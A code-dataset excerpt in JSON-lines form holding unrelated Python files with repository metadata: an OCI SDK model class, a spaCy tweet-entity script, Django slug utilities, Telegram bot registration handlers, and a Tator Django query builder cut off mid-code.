"usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 168, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 186, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 211, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "31584512459", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass AuditTrailDimensions(object):\n \"\"\"\n Details of aggregation dimensions used for summarizing audit trails.\n \"\"\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"INACTIVE\"\n LIFECYCLE_STATE_INACTIVE = \"INACTIVE\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"UPDATING\"\n LIFECYCLE_STATE_UPDATING = \"UPDATING\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"ACTIVE\"\n LIFECYCLE_STATE_ACTIVE = \"ACTIVE\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"DELETING\"\n LIFECYCLE_STATE_DELETING = \"DELETING\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"FAILED\"\n LIFECYCLE_STATE_FAILED = \"FAILED\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"NEEDS_ATTENTION\"\n LIFECYCLE_STATE_NEEDS_ATTENTION = \"NEEDS_ATTENTION\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new AuditTrailDimensions object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param location:\n The value to assign to the location property of this AuditTrailDimensions.\n :type location: str\n\n :param lifecycle_state:\n The value to assign to the lifecycle_state property of this AuditTrailDimensions.\n Allowed values for this property are: \"INACTIVE\", \"UPDATING\", \"ACTIVE\", \"DELETING\", \"FAILED\", \"NEEDS_ATTENTION\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type lifecycle_state: str\n\n :param status:\n The value to assign to the status property of this AuditTrailDimensions.\n :type status: str\n\n :param target_id:\n The value to assign to the target_id property of this AuditTrailDimensions.\n :type target_id: str\n\n \"\"\"\n self.swagger_types = {\n 'location': 'str',\n 'lifecycle_state': 'str',\n 'status': 'str',\n 'target_id': 'str'\n }\n\n self.attribute_map = {\n 'location': 'location',\n 'lifecycle_state': 'lifecycleState',\n 'status': 'status',\n 'target_id': 'targetId'\n }\n\n self._location = None\n self._lifecycle_state = None\n self._status = None\n self._target_id = None\n\n @property\n def location(self):\n \"\"\"\n Gets the location of this AuditTrailDimensions.\n The location represents the source of audit records that provides documentary evidence of the sequence of activities in the target 
database.\n\n\n :return: The location of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location):\n \"\"\"\n Sets the location of this AuditTrailDimensions.\n The location represents the source of audit records that provides documentary evidence of the sequence of activities in the target database.\n\n\n :param location: The location of this AuditTrailDimensions.\n :type: str\n \"\"\"\n self._location = location\n\n @property\n def lifecycle_state(self):\n \"\"\"\n Gets the lifecycle_state of this AuditTrailDimensions.\n The current state of the audit trail.\n\n Allowed values for this property are: \"INACTIVE\", \"UPDATING\", \"ACTIVE\", \"DELETING\", \"FAILED\", \"NEEDS_ATTENTION\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The lifecycle_state of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._lifecycle_state\n\n @lifecycle_state.setter\n def lifecycle_state(self, lifecycle_state):\n \"\"\"\n Sets the lifecycle_state of this AuditTrailDimensions.\n The current state of the audit trail.\n\n\n :param lifecycle_state: The lifecycle_state of this AuditTrailDimensions.\n :type: str\n \"\"\"\n allowed_values = [\"INACTIVE\", \"UPDATING\", \"ACTIVE\", \"DELETING\", \"FAILED\", \"NEEDS_ATTENTION\"]\n if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):\n lifecycle_state = 'UNKNOWN_ENUM_VALUE'\n self._lifecycle_state = lifecycle_state\n\n @property\n def status(self):\n \"\"\"\n Gets the status of this AuditTrailDimensions.\n The current sub-state of the audit trail..\n\n\n :return: The status of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"\n Sets the status of this AuditTrailDimensions.\n The current sub-state of the audit trail..\n\n\n :param status: The status of this AuditTrailDimensions.\n :type: str\n \"\"\"\n self._status = status\n\n @property\n def target_id(self):\n \"\"\"\n Gets the target_id of this AuditTrailDimensions.\n The OCID of the Data Safe target for which the audit trail is created.\n\n\n :return: The target_id of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._target_id\n\n @target_id.setter\n def target_id(self, target_id):\n \"\"\"\n Sets the target_id of this AuditTrailDimensions.\n The OCID of the Data Safe target for which the audit trail is created.\n\n\n :param target_id: The target_id of this AuditTrailDimensions.\n :type: str\n \"\"\"\n self._target_id = target_id\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/data_safe/models/audit_trail_dimensions.py", "file_name": "audit_trail_dimensions.py", "file_ext": "py", "file_size_in_byte": 6443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 128, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 181, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "5715898895", "text": "\"\"\"Engine to extract information from tweets.\"\"\"\nimport 
spacy\nimport json\nimport os\nimport ijson\n\nnlp = spacy.load('en')\n\ndef extract_ents(doc):\n \"\"\"Extract entities from the Spacy NLP document.\"\"\"\n for ent in doc.ents:\n yield ent\n\nif __name__ == '__main__':\n texts = [\n u\"GM L'Enfant! The truck is back on 7th & Maryland Ave, NW (11-1:30)\",\n u\"The truck's on L between 19th & 20th (11-1:30)\",\n u\"The truck will be @NavyFederal 820 Follin Ln, Vienna, Va ⌚️11-2:00\"\n ]\n if os.path.exists('tweets.json'):\n with open('tweets.json') as tweets_file:\n tweets = json.load(tweets_file)\n# print('loading')\n# tweets = ijson.items(tweets_file, '')\n# print('done')\n texts = [tweet['text'] for tweet in tweets]\n for i, doc in enumerate(nlp.pipe(texts, batch_size=50, n_threads=4)):\n print(\"{}: {}\".format(doc, doc.is_parsed))\n for ent in extract_ents(doc):\n print('-->', ent.label_, ent)\n", "repo_name": "dwyerk/fett", "sub_path": "nlp/engine.py", "file_name": "engine.py", "file_ext": "py", "file_size_in_byte": 1012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "spacy.load", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "5555036900", "text": "import random, string, os\nfrom django.utils.text import slugify\n\ndef random_string_generator(size):\n return ''.join([random.choice(string.ascii_lowercase) for i in range(size)])\n# get extension of any file\ndef get_file_ext(filepath):\n basename = os.path.basename(filepath)\n name, ext = os.path.splitext(basename)\n return name, ext\n\n# get image path for upload image\ndef upload_image_path(instance, filename):\n new_filename = random_string_generator(16)\n name, ext = get_file_ext(filename)\n final_filename = f'{new_filename}{ext}'\n return f'products/{final_filename}'\n\ndef unique_slug_generator(instance, new_slug=None):\n \"\"\"\n This is for a Django project and it assumes your instance\n has a model with a slug field and a title character (char) field.\n \"\"\"\n if new_slug is not None:\n slug = new_slug\n else:\n slug = slugify(instance.title)\n\n Klass = instance.__class__\n qs_exists = Klass.objects.filter(slug=slug).exists()\n if qs_exists:\n new_slug = \"{slug}-{randstr}\".format(\n slug=slug,\n randstr=random_string_generator(size=4)\n )\n return unique_slug_generator(instance, new_slug=new_slug)\n return slug", "repo_name": "MuhammadSaim/django-ecommerce", "sub_path": "products/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.choice", "line_number": 5, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.utils.text.slugify", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "11069631134", "text": "from telegram import Update\nfrom telegram.ext import CallbackContext\nfrom Buttons import *\nfrom database import *\n\n\ndef start(update:Update, 
context:CallbackContext):\n print('Asalomu alaykum')\n if chek_user(update.effective_user.id):\n update.message.reply_text(\"Salom\",reply_markup=main_buttons())\n return 'state_main'\n update.message.reply_text(\"Assalomu alaykum Botimizga xush kelibsiz\\n\"\n \"Ro'yxatdan o'tish uchun FIO ni yuboring\", reply_markup=ReplyKeyboardRemove())\n return 'state_name'\n\ndef command_name(update:Update, context:CallbackContext):\n text = update.message.text\n update.message.reply_text(\"Sizning ismi familyangiz \"+text+\"\\n\"\n \"Yaxshi endi telefon raqamingizni yuboring\", reply_markup=phone_button())\n context.user_data['name'] = text\n return 'state_phone'\n\ndef command_phone(update:Update, context:CallbackContext):\n try:\n contact = update.message.contact\n phone_number = contact.phone_number\n except Exception as e:\n phone=update.message.text\n if (phone[0]=='+' and len(phone)==13 and (phone[1:4]=='998') or phone[:3]=='998' and len(phone)==12) or (len(phone)==9):\n phone_number=phone\n else:\n update.message.reply_text('Siz telfon raqamingizni xato kiritizgiz qayat UZB nomer kiritib koring:')\n return 'state_phone'\n\n context.user_data['phone'] = phone_number\n update.message.reply_text(f\"Sizning Ismingiz: {context.user_data['name']}\\n\"\n f\"Sizning telefon raqamingiz: {phone_number}\\n\"\n f\"Endi esa viloyatingizni kiriting?\")\n return 'state_viloyat'\n\ndef command_viloyat(update:Update, context:CallbackContext):\n text = update.message.text\n update.message.reply_html(f\"Sizning ism familyangiz : <b>{context.user_data['name']}</b>\\n\"\n f\"Sizning raqamingiz: <b>{context.user_data['phone']}</b>\\n\"\n f\"Siznig viloyatingiz: <b>{text}</b>\\n\"\n f\"<b><i>Siz mufaqiyatli ro'yxatdan o'tingiz</i></b>\")\n update.message.reply_html(\" Buyurtmani birga joylashtiramiz\",reply_markup=main_buttons())\n add_user(update.effective_user,context.user_data['name'],update.effective_user.first_name,context.user_data['phone'],text)\n return 'state_main'\n\ndef commandd_category(update:Update,context:CallbackContext):\n query=update.callback_query\n data=str(query.data)\n query.message.delete()\n\n if data.isdigit():\n cat_name=get_products_by_catid(int(data))[0]\n query.message.reply_photo(open('images/img.png','rb'),caption=f\"Bo'lim <b>{cat_name}</b>\",parse_mode=\"HTML\",reply_markup=product_button_bycat(int(data)))\n\n\n\n\n\n\n\n", "repo_name": "ELBEK2003/Viloyatbot", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 2813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "telegram.Update", "line_number": 7, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 7, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 16, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 16, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 23, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 23, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 41, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 41, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 51, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "28037440980", "text": "\"\"\" TODO: add documentation for this \"\"\"\nimport logging\n\nfrom 
dateutil.parser import parse as dateutil_parse\nimport pytz\nimport re\nimport uuid\n\nfrom django.db.models.functions import Cast, Greatest\nfrom django.db.models import Func, F, Q, Count, Subquery, OuterRef, Value\nfrom django.contrib.gis.db.models import (\n BigIntegerField,\n BooleanField,\n CharField,\n DateTimeField,\n FloatField,\n PointField,\n TextField,\n UUIDField,\n)\nfrom enumfields import EnumField\n\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.gis.measure import Distance\nfrom django.http import Http404\nfrom pgvector.django import L2Distance, MaxInnerProduct, CosineDistance, VectorField\n\nfrom ..models import (\n File,\n FileType,\n Leaf,\n LeafType,\n Localization,\n LocalizationType,\n Media,\n MediaType,\n Section,\n State,\n StateType,\n)\n\nfrom ._attributes import KV_SEPARATOR\n\nlogger = logging.getLogger(__name__)\n\nALLOWED_TYPES = {\n \"attribute\": (\"bool\", \"float\", \"datetime\", \"keyword\", \"string\", \"int\", \"enum\"),\n \"attribute_lt\": (\"float\", \"datetime\", \"int\"),\n \"attribute_lte\": (\"float\", \"datetime\", \"int\"),\n \"attribute_gt\": (\"float\", \"datetime\", \"int\"),\n \"attribute_gte\": (\"float\", \"datetime\", \"int\"),\n \"attribute_contains\": (\"keyword\", \"string\", \"enum\"),\n \"attribute_distance\": (\"geopos\",),\n}\n\nOPERATOR_SUFFIXES = {\n \"attribute\": \"\",\n \"attribute_lt\": \"__lt\",\n \"attribute_lte\": \"__lte\",\n \"attribute_gt\": \"__gt\",\n \"attribute_gte\": \"__gte\",\n \"attribute_contains\": \"__icontains\",\n \"attribute_distance\": \"__distance_lte\",\n}\n\n\ndef _sanitize(name):\n return re.sub(r\"[^a-zA-Z]\", \"_\", name)\n\n\ndef _look_for_section_uuid(media_qs, maybe_uuid_val):\n media_qs = media_qs.annotate(\n section_val=Cast(F(\"attributes__tator_user_sections\"), TextField())\n )\n # Note: This escape is required because of database_qs usage\n return media_qs.filter(section_val=f'\"{maybe_uuid_val}\"')\n\n\ndef supplied_name_to_field(supplied_name):\n logger.info(f\"SNAME={supplied_name}\")\n if supplied_name.startswith(\"-\"):\n desc = True\n supplied_name = supplied_name[1:]\n else:\n desc = False\n if supplied_name.startswith(\"$\"):\n db_lookup = supplied_name[1:]\n else:\n db_lookup = f\"attributes__{supplied_name}\"\n\n if desc:\n db_lookup = \"-\" + db_lookup\n return db_lookup\n\n\ndef _related_search(\n qs, project, relevant_state_type_ids, relevant_localization_type_ids, search_obj\n):\n related_state_types = StateType.objects.filter(pk__in=relevant_state_type_ids)\n related_localization_types = LocalizationType.objects.filter(\n pk__in=relevant_localization_type_ids\n )\n related_matches = []\n for entity_type in related_state_types:\n state_qs = State.objects.filter(\n project=project, type=entity_type, deleted=False, variant_deleted=False\n )\n state_qs = get_attribute_psql_queryset_from_query_obj(state_qs, search_obj)\n if state_qs.exists():\n related_matches.append(state_qs)\n for entity_type in related_localization_types:\n local_qs = Localization.objects.filter(\n project=project, type=entity_type, deleted=False, variant_deleted=False\n )\n local_qs = get_attribute_psql_queryset_from_query_obj(local_qs, search_obj)\n if local_qs.exists():\n related_matches.append(local_qs)\n\n if related_matches:\n # Convert result matches to use Media model because related_matches might be States or Localizations\n # Note: 'media' becomes 'id' when this happens. 
The two columns are 'id','count' in this result.\n # Iterate over each related match and merge it into the previous Media result set. Add 'count' so it is an accurate hit count\n # for any matching metadata.\n # Finally reselect all media in this concatenated set by id. Annotate the incident with the count from the previous record set, which is\n # now the sum of any hit across any metadata type.\n orig_list = [*related_matches]\n related_match = related_matches.pop()\n # Pop and process the list\n media_vals = related_match.values(\"media\")\n for related_match in related_matches:\n this_vals = related_match.values(\"media\")\n media_vals = media_vals.union(this_vals)\n\n # We now have all the matching media, but lost the score information\n # going back to the original set, make a bunch of subqueries to calculate the\n # greatest score for a particular media, if there were duplicates\n # list comp didn't play nice here, but this is easier to read anyway\n score = []\n for x in orig_list:\n annotated_x = x.values(\"media\").annotate(count=Count(\"media\"))\n filtered_x = annotated_x.filter(media=OuterRef(\"id\"))\n values_x = filtered_x.values(\"count\").order_by(\"-count\")[:1]\n score.append(Subquery(values_x))\n if len(score) > 1:\n qs = qs.filter(pk__in=media_vals.values(\"media\")).annotate(incident=Greatest(*score))\n else:\n qs = qs.filter(pk__in=media_vals.values(\"media\")).annotate(incident=score[0])\n else:\n qs = qs.filter(pk=-1).annotate(incident=Value(0))\n return qs\n\n\ndef _convert_boolean(value):\n if type(value) == bool:\n return value\n if value.lower() == \"false\":\n value = False\n elif value.lower() == \"true\":\n value = True\n else:\n value = bool(value)\n return value\n\n\ndef _get_info_for_attribute(entity_type, key):\n \"\"\"Returns the first matching dtype with a matching key\"\"\"\n retval = {}\n if key.startswith(\"$\"):\n if key in [\"$x\", \"$y\", \"$u\", \"$v\", \"$width\", \"$height\", \"$fps\"]:\n return {\"name\": key[1:], \"dtype\": \"float\"}\n elif key in [\n \"$version\",\n \"$user\",\n \"$type\",\n \"$created_by\",\n \"$modified_by\",\n \"$frame\",\n \"$num_frames\",\n \"$section\",\n \"$id\",\n ]:\n retval = {\"name\": key[1:], \"dtype\": \"int\"}\n elif key in [\"$created_datetime\", \"$modified_datetime\"]:\n retval = {\"name\": key[1:], \"dtype\": \"datetime\"}\n elif key in [\"$name\", \"$elemental_id\"]:\n retval = {\"name\": key[1:], \"dtype\": \"string\"}\n elif key == \"tator_user_sections\":\n retval = {\"name\": \"tator_user_sections\", \"dtype\": \"string\"}\n else:\n for attribute_info in entity_type.attribute_types:\n if attribute_info[\"name\"] == key:\n retval = attribute_info\n break\n return retval\n\n\ndef _get_field_for_attribute(entity_type, key):\n \"\"\"Returns the field type for a given key in a project/annotation_type\"\"\"\n lookup_map = {\n \"bool\": BooleanField,\n \"int\": BigIntegerField,\n \"float\": FloatField,\n \"enum\": CharField,\n \"string\": CharField,\n \"datetime\": DateTimeField,\n \"geopos\": PointField,\n \"float_array\": VectorField,\n None: None,\n }\n info = _get_info_for_attribute(entity_type, key)\n return lookup_map[info.get(\"dtype\", None)], info.get(\"size\", None)\n\n\ndef _convert_attribute_filter_value(pair, annotation_type, operation):\n kv = pair.split(KV_SEPARATOR, 1)\n key, value = kv\n info = _get_info_for_attribute(annotation_type, key)\n if \"dtype\" not in info:\n return None, None, None\n dtype = info[\"dtype\"]\n\n if dtype not in ALLOWED_TYPES[operation]:\n raise 
ValueError(f\"Filter operation '{operation}' not allowed for dtype '{dtype}'!\")\n if dtype == \"bool\":\n value = _convert_boolean(value)\n if dtype == \"double\":\n value = float(value)\n elif dtype == \"long\":\n value = int(value)\n elif dtype == \"date\":\n value = dateutil_parse(value)\n elif dtype == \"geopos\":\n distance, lat, lon = value.split(\"::\")\n value = (\n Point(float(lon), float(lat), srid=4326),\n Distance(km=float(distance)),\n \"spheroid\",\n )\n logger.info(f\"{distance}, {lat},{lon}\")\n return key, value, dtype\n\n\ndef get_attribute_filter_ops(params, data_type):\n filter_ops = []\n for op in ALLOWED_TYPES.keys():\n for kv in params.get(op, []):\n key, value, _ = _convert_attribute_filter_value(kv, data_type, op)\n if key:\n filter_ops.append((key, value, op))\n return filter_ops\n\n\ndef build_query_recursively(query_object, castLookup, is_media, project, all_casts):\n query = Q()\n if \"method\" in query_object:\n method = query_object[\"method\"].lower()\n sub_queries = []\n for x in query_object[\"operations\"]:\n query, casts = build_query_recursively(x, castLookup, is_media, project, all_casts)\n sub_queries.append(query)\n for cast in casts:\n all_casts.add(cast)\n if len(sub_queries) == 0:\n return Q(), []\n if method == \"not\":\n if len(sub_queries) != 1:\n raise (Exception(\"NOT operator can only be applied to one suboperation\"))\n query = ~sub_queries[0]\n elif method == \"and\":\n query = sub_queries.pop()\n for q in sub_queries:\n query = query & q\n elif method == \"or\":\n query = sub_queries.pop()\n for q in sub_queries:\n query = query | q\n else:\n attr_name = query_object[\"attribute\"]\n operation = query_object[\"operation\"]\n inverse = query_object.get(\"inverse\", False)\n value = query_object[\"value\"]\n\n if attr_name == \"$section\":\n # Handle section based look-up\n section = Section.objects.filter(pk=value)\n if not section.exists():\n raise Http404\n\n relevant_state_type_ids = StateType.objects.filter(project=project)\n relevant_localization_type_ids = LocalizationType.objects.filter(project=project)\n media_qs = Media.objects.filter(project=project)\n section_uuid = section[0].tator_user_sections\n if section_uuid:\n media_qs = _look_for_section_uuid(media_qs, section_uuid)\n\n if section[0].object_search:\n media_qs = get_attribute_psql_queryset_from_query_obj(\n media_qs, section[0].object_search\n )\n\n if section[0].related_object_search:\n media_qs = _related_search(\n media_qs,\n project,\n relevant_state_type_ids,\n relevant_localization_type_ids,\n section[0].related_object_search,\n )\n if media_qs.exists() == False:\n query = Q(pk=-1)\n elif is_media:\n query = Q(pk__in=media_qs)\n else:\n query = Q(media__in=media_qs)\n all_casts.add(\"tator_user_sections\")\n else:\n if attr_name.startswith(\"$\"):\n db_lookup = attr_name[1:]\n else:\n db_lookup = f\"casted_{_sanitize(attr_name)}\"\n if operation.startswith(\"date_\"):\n # python is more forgiving then SQL so convert any partial dates to\n # full-up ISO8601 datetime strings WITH TIMEZONE.\n operation = operation.replace(\"date_\", \"\")\n if operation == \"range\":\n utc_datetime = dateutil_parse(value[0]).astimezone(pytz.UTC)\n value_0 = utc_datetime.isoformat()\n utc_datetime = dateutil_parse(value[1]).astimezone(pytz.UTC)\n value_1 = utc_datetime.isoformat()\n value = (value_0, value_1)\n else:\n utc_datetime = dateutil_parse(value).astimezone(pytz.UTC)\n value = utc_datetime.isoformat()\n elif operation.startswith(\"distance_\"):\n distance, lat, lon = value\n 
value = (\n Point(float(lon), float(lat), srid=4326),\n Distance(km=float(distance)),\n \"spheroid\",\n )\n\n castFunc = castLookup.get(attr_name, None)\n # NOTE: For string functions avoid the '\"' work around due to the django\n # string handling bug\n # only apply if cast func is active\n if castFunc and operation in [\"icontains\", \"iendswith\", \"istartswith\"]:\n castFunc = lambda x: x\n # Don't use casts for these operations either\n if attr_name.startswith(\"$\") == False:\n db_lookup = f\"attributes__{attr_name}\"\n if operation in [\"isnull\"]:\n value = _convert_boolean(value)\n elif castFunc:\n value = castFunc(value)\n else:\n return Q(pk=-1), []\n if operation in [\"date_eq\", \"eq\"]:\n query = Q(**{f\"{db_lookup}\": value})\n else:\n query = Q(**{f\"{db_lookup}__{operation}\": value})\n\n # If we actually use the entity, add it to casts.\n if attr_name.startswith(\"$\") is False:\n all_casts.add(attr_name)\n if inverse:\n query = ~query\n\n return query, all_casts\n\n\ndef get_attribute_psql_queryset_from_query_obj(qs, query_object):\n if qs.exists() == False:\n return qs.filter(pk=-1)\n\n is_media = False\n if type(qs[0]) == Media:\n is_media = True\n\n typeLookup = {\n Media: MediaType,\n Localization: LocalizationType,\n State: StateType,\n Leaf: LeafType,\n File: FileType,\n }\n # NOTE: Usage of database_qs requires escaping string values manually\n # Else lookups will result in misses.\n castLookup = {\n \"bool\": _convert_boolean,\n \"int\": int,\n \"float\": float,\n \"enum\": lambda x: f'\"{x}\"',\n \"string\": lambda x: f'\"{x}\"',\n \"datetime\": str,\n \"geopos\": lambda x: x,\n \"float_array\": None,\n }\n\n attributeCast = {}\n annotateField = {}\n typeModel = typeLookup[type(qs[0])]\n typeObjects = typeModel.objects.filter(project=qs[0].project)\n for typeObject in typeObjects:\n for attributeType in typeObject.attribute_types:\n attributeCast[attributeType[\"name\"]] = castLookup[attributeType[\"dtype\"]]\n annotateField[attributeType[\"name\"]], 